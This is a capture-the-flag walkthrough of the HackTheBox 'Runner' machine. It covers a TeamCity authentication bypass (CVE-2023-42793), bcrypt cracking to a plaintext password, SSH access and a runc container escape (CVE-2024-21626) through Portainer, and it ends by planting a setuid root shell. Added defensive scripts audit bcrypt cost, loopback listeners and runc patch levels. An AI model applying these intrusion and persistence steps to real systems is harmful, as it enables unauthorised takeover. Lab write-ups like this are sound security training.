Runner
Recon
HTTP (80)
Port 80 appears to serve a site for a server-hosting business:
Directory and subdomain enumeration came up empty-handed. A common CI/CD pipeline product we have seen is TeamCity, which isn't in the wordlists, so I tried it manually as a virtual host:
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Runner]
└─$ curl runner.htb -H 'Host: teamcity.runner.htb' -i
HTTP/1.1 401
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 27 May 2024 14:09:42 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
TeamCity-Node-Id: MAIN_SERVER
WWW-Authenticate: Basic realm="TeamCity"
WWW-Authenticate: Bearer realm="TeamCity"
Cache-Control: no-store
Authentication required
To login manually go to "/login.html" page
TeamCity login page. We need credentials to log in...
Under the login form we see the version number, and a quick Google search leads us to a CVE: https://github.com/Zyad-Elsayed/CVE-2023-42793
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Runner]
└─$ py CVE-2023-42793/CVE-2023-42793.py -u http://teamcity.runner.htb
[+] http://teamcity.runner.htb/login.html [H454NSec1037:@H454NSec]
There are no agents that can run pipelines for us, so there's no point in creating a project and trying to set up a pipeline for RCE.
Let's take a backup to grab the config files and other interesting files:
Hashes found?
➜ cat .\hashes
$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye
$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em
➜ .\hashcat.exe --show .\hashes
The following 4 hash-modes match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=rockyou.txt --format=bcrypt .\hashes
...
$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em:piper123
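The reason rockyou cracked one of these so quickly is visible in the hash string itself: the `$2a$07$` prefix means a bcrypt cost of 7, i.e. only 2^7 rounds of the expensive key setup, well under the work factor of 10 or more that the OWASP Password Storage Cheat Sheet recommends. The following parser, an added example that is not part of the original writeup, splits a bcrypt modular-crypt string into scheme, cost, salt and digest and flags low work factors; the two sample hashes are the ones recovered above, and the threshold constant is an assumption taken from the OWASP guidance.

```python
import re

# Modular-crypt layout of a bcrypt hash: $<scheme>$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r"^\$(?P<scheme>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)

# Assumption: minimum acceptable work factor, per the OWASP Password Storage Cheat Sheet.
RECOMMENDED_MIN_COST = 10


def parse_bcrypt(hash_str: str) -> dict:
    """Split a bcrypt string into its fields and report the work factor."""
    m = BCRYPT_RE.match(hash_str.strip())
    if not m:
        raise ValueError("not a bcrypt modular-crypt string")
    cost = int(m.group("cost"))
    if not 4 <= cost <= 31:
        raise ValueError(f"bcrypt cost {cost} outside the valid range 4..31")
    return {
        "scheme": m.group("scheme"),
        "cost": cost,
        "iterations": 2 ** cost,  # the expensive key setup loop runs 2^cost times
        "salt": m.group("salt"),
        "digest": m.group("digest"),
        "weak": cost < RECOMMENDED_MIN_COST,
    }


def audit(hashes):
    """Return one (hash, cost, verdict) tuple per non-blank input line."""
    out = []
    for h in hashes:
        h = h.strip()
        if not h:
            continue
        try:
            info = parse_bcrypt(h)
        except ValueError as exc:
            out.append((h, None, f"skipped: {exc}"))
            continue
        out.append((h, info["cost"], "WEAK" if info["weak"] else "ok"))
    return out


# The two hashes recovered from the TeamCity backup (copied from the writeup above).
SAMPLE_HASHES = """
$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye
$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em
"""

if __name__ == "__main__":
    for h, cost, verdict in audit(SAMPLE_HASHES.splitlines()):
        print(f"{verdict:5} cost={cost} {h}")
```

Running it reports both hashes as WEAK at cost 7; the same check over an application's user table is a cheap way to spot stores that need their work factor raised before an attacker with a backup copy gets to them.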
Looks like we also have an id_rsa key:
SSH (22)
[[Labs/HackTheBox/Seasonal/Season 5/Runner/id_rsa|id_rsa]]
Verify owner:
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Runner]
└─$ ssh-keygen -l -f id_rsa
3072 SHA256:YBrlVeYeOPwQhNizkxaVtrtBTlLZ2/T5XBekbmDbEL4 john@runner (RSA)
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Runner]
└─$ ssh john@runner.htb -i id_rsa
No password needed... hmm. It's still a good idea to know it.
User.txt
john@runner:~$ cat user.txt
06994b1d5849190310fc4e41f9b6a034
Privilege Escalation
We only managed to get matthew's password, but where can we use it? su doesn't work.
john@runner:~$ ss -tlpn4
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:8111 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:9443 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:5005 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:9000 0.0.0.0:*
LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
We have a few applications listening on loopback only; we know 8111 is TeamCity, but what are the others?
Portainer is running on 9000, and 9443 is probably its HTTPS version. 5005 seems unresponsive to HTTP, and netcat shows nothing.
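Separating loopback-bound listeners from those exposed on every interface is the first triage step on any host you land on, and it is the same list a defender should review when deciding what an SSH-key holder can reach through port forwarding. The parser below is an added example, not part of the original writeup; it consumes a copy of the `ss -tlpn4` output shown above (embedded here as constructed sample text) and classifies each listener by bind scope. It also strips the `%lo` interface suffix that ss prints on the resolver socket and handles IPv6 `[::]` bindings, which the page's IPv4-only listing did not include.

```python
# Constructed copy of the `ss -tlpn4` output from the writeup above.
SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      4096   127.0.0.53%lo:53    0.0.0.0:*
LISTEN 0      4096   127.0.0.1:8111      0.0.0.0:*
LISTEN 0      4096   127.0.0.1:9443      0.0.0.0:*
LISTEN 0      4096   127.0.0.1:5005      0.0.0.0:*
LISTEN 0      4096   127.0.0.1:9000      0.0.0.0:*
LISTEN 0      511    0.0.0.0:80          0.0.0.0:*
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
"""


def parse_local_addr(field: str):
    """Split ss's 'Local Address:Port' column into (address, port).

    Drops the '%iface' scope suffix and IPv6 brackets so the address
    can be compared directly. Returns None for a wildcard port ('*').
    """
    addr, _, port = field.rpartition(":")
    addr = addr.strip("[]").split("%", 1)[0]
    return (addr, int(port)) if port.isdigit() else None


def classify(addr: str) -> str:
    """Bind scope: reachable from everywhere, only from the host itself, or one specific address."""
    if addr in ("0.0.0.0", "::", "*"):
        return "all-interfaces"
    if addr.startswith("127.") or addr == "::1":
        return "loopback"
    return "specific"


def listeners(ss_text: str):
    """Parse LISTEN rows into dicts of address, port and scope; header and junk lines are skipped."""
    rows = []
    for line in ss_text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] != "LISTEN":
            continue
        parsed = parse_local_addr(parts[3])
        if parsed is None:
            continue
        addr, port = parsed
        rows.append({"addr": addr, "port": port, "scope": classify(addr)})
    return rows


def loopback_only_ports(ss_text: str):
    """Ports that an outside scanner cannot see but an SSH -L forward can reach."""
    return sorted(r["port"] for r in listeners(ss_text) if r["scope"] == "loopback")


def exposed_ports(ss_text: str):
    """Ports bound to every interface, i.e. what nmap saw from the outside."""
    return sorted(r["port"] for r in listeners(ss_text) if r["scope"] == "all-interfaces")


if __name__ == "__main__":
    print("exposed:      ", exposed_ports(SS_OUTPUT))
    print("loopback-only:", loopback_only_ports(SS_OUTPUT))
```

On the sample it yields 22 and 80 as exposed and 53, 5005, 8111, 9000 and 9443 as loopback-only, which matches the manual reading above: everything interesting here is reachable only through the SSH key.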
john@runner:/data$ find / -name '*portainer*' -ls 2>/dev/null
1042 0 lrwxrwxrwx 1 root root 32 May 27 13:50 /run/systemd/units/invocation:portainer.service -> e4d709e3c81d4bd489261b0b325c9f25
61374 0 lrwxrwxrwx 1 root root 37 Feb 28 07:57 /etc/systemd/system/multi-user.target.wants/portainer.service -> /etc/systemd/system/portainer.service
61382 4 -rw-r--r-- 1 root root 276 Feb 28 20:25 /etc/systemd/system/portainer.service
61576 0 lrwxrwxrwx 1 root root 36 Feb 28 20:31 /etc/nginx/sites-enabled/portainer -> /etc/nginx/sites-available/portainer
62184 4 -rw-r--r-- 1 root root 352 Feb 28 22:24 /etc/nginx/sites-available/portainer
393229 88 -rw------- 1 root root 131072 May 27 14:55 /data/portainer.db
393232 4 -rw------- 1 root root 227 Feb 28 07:51 /data/portainer.key
393233 4 -rw------- 1 root root 190 Feb 28 07:51 /data/portainer.pub
1039 4 drwxr-xr-x 4 root docker 4096 Apr 4 10:24 /opt/portainer
1579 49924 -rwxr-xr-x 1 root docker 51122176 Dec 7 08:15 /opt/portainer/portainer
3094 0 drwxr-xr-x 2 root root 0 May 27 13:50 /sys/fs/cgroup/system.slice/portainer.service
john@runner:/data$ cd /opt/portainer/
john@runner:/opt/portainer$ ls -l
total 252236
-rwxr-xr-x 1 root docker 48047088 Dec 7 08:15 docker
-rwxr-xr-x 1 root docker 60470973 Dec 7 08:15 docker-compose
-rwxr-xr-x 1 root docker 50597888 Dec 7 08:15 helm
-rwxr-xr-x 1 root docker 48037888 Dec 7 08:15 kubectl
drwxr-xr-x 2 root docker 4096 Apr 4 10:24 mustache-templates
-rwxr-xr-x 1 root docker 51122176 Dec 7 08:15 portainer
drwxr-xr-x 3 root docker 4096 Apr 4 10:24 public
john@runner:/opt/portainer$ ls public/
060b2710bdbbe3dfe48b.svg 51906a7e4bd0e1d9e771.png 9d07a3ace464cfd6e27c.png main.712d6f30396f42406a3d.js runtime.942fa683274b3d3c26cf.js vendor.c6c227160a59d929ec43.js
112a479c093f4729251d.png 63a301f0574f1a696ce6.png c2c179f41199d25e0055.png main.712d6f30396f42406a3d.js.LICENSE.txt runtime.942fa683274b3d3c26cf.js.map vendor.c6c227160a59d929ec43.js.LICENSE.txt
19c2b168a8d85994e14e.png 63c1259abd88a9d2cebc.svg d3a18c5002453f58c8b9.png main.712d6f30396f42406a3d.js.map timeout.html vendor.c6c227160a59d929ec43.js.map
2b3c7053dcd54989a6f5.png 6d50eaeb9f128c130ed9.xml index.html main.7d6053e1c574421c1788.css vendor.b4533442c1cbb18b98a1.css
2dcfc527d067d4ae3424.png 7e697c5bab4f819328df.svg locales main.7d6053e1c574421c1788.css.map vendor.b4533442c1cbb18b98a1.css.map
It seems we have a built release of Portainer, and probably the only way to interact with it is to port-forward it over SSH (local port 9000 to 127.0.0.1:9000 on the box):
└─$ ssh john@runner.htb -i id_rsa -L 9000:127.0.0.1:9000

Using the credentials matthew:piper123 we are able to log in.
-> Googling "docker escape cve":
-> https://medium.com/@sk3pper/play-with-cve-2024-21626-2b4377e9577f
-> https://github.com/NitroCao/CVE-2024-21626
Portainer screenshots: primary page, available images, create new container.
It kept complaining about /proc/self/fd/8: the container ran for about 300 milliseconds and shut down right away. It worked with /proc/self/fd/7, but after some time 8 also worked? I guess the build step failed or something on the previous attempt:

shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@67ab15dc91e3:.# ls /root
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@67ab15dc91e3:.# ls ../../../../../../../../../root
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
docker_clean.sh initial_state.txt monitor.sh root.txt
root@67ab15dc91e3:.# cd ../../../../../../../../../root
chdir: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@67ab15dc91e3:../../../../../../../../../root# ls
docker_clean.sh initial_state.txt monitor.sh root.txt
root@67ab15dc91e3:../../../../../../../../../root# cat root.txt
3d236479467eb9441598807fe1965163
root@67ab15dc91e3:../../../../../../../../../root# cp /bin/sh ../tmp/rootsh && chmod 4777 ../tmp/rootsh
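From the defender's side there are two cheap checks for this escape: whether the host's runc is at or above 1.1.12, the release that fixed CVE-2024-21626, and whether any container or image config carries a WorkingDir under /proc/self/fd, which is the trigger the container above was created with. The script below is an added example, not code from the writeup or from the linked exploit repositories; the `runc --version` text and the `docker inspect` JSON it consumes are constructed samples embedded inline, and the fixed-version constant is stated from the CVE's advisory rather than taken from the page.

```python
import json
import re

# runc 1.1.12 is the release that fixed CVE-2024-21626 (advisory fact, not from the writeup).
FIXED_RUNC = (1, 1, 12)
# A WorkingDir at or below /proc/self/fd is the indicator the container above relied on.
PROC_FD_RE = re.compile(r"^/proc/self/fd(/|$)")


def parse_runc_version(text: str):
    """Extract (major, minor, patch) from `runc --version` output; None if not found.

    Pre-release suffixes such as '-rc1' are ignored, which errs towards
    calling a release candidate patched; tighten if your fleet ships RCs.
    """
    m = re.search(r"runc version (\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None


def runc_is_patched(version) -> bool:
    """True when the parsed version is at or above the fixed release."""
    return version is not None and tuple(version) >= FIXED_RUNC


def suspicious_workdir(workdir) -> bool:
    """Flag a WORKDIR that points into the container's own fd table."""
    return bool(workdir) and PROC_FD_RE.match(workdir) is not None


def audit_inspect(inspect_json: str):
    """Walk `docker inspect` output (a JSON list) and return (name, WorkingDir) for hits."""
    findings = []
    for c in json.loads(inspect_json):
        wd = c.get("Config", {}).get("WorkingDir", "") or ""
        if suspicious_workdir(wd):
            findings.append((c.get("Name", "?"), wd))
    return findings


# Constructed sample: what `runc --version` prints on an unpatched 1.1.11 host.
SAMPLE_RUNC_VERSION = "runc version 1.1.11\nspec: 1.0.2-dev\ngo: go1.20\n"

# Constructed sample: trimmed `docker inspect` output for two containers.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/build-1", "Config": {"WorkingDir": "/proc/self/fd/8"}},
    {"Name": "/web", "Config": {"WorkingDir": "/app"}},
])


def report(runc_text: str, inspect_json: str) -> dict:
    """Combine both checks into one result a monitoring job can act on."""
    version = parse_runc_version(runc_text)
    return {
        "runc_version": version,
        "runc_patched": runc_is_patched(version),
        "suspicious_containers": audit_inspect(inspect_json),
    }


if __name__ == "__main__":
    print(json.dumps(report(SAMPLE_RUNC_VERSION, SAMPLE_INSPECT), indent=2))
```

Against the samples it reports runc 1.1.11 as unpatched and lists /build-1 with its /proc/self/fd/8 working directory; on a real host feed it the output of `runc --version` and `docker inspect $(docker ps -aq)`.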
Writeup referenced: https://blog.taipanbyte.ru/hackthebox/Runner-HTB-Writeup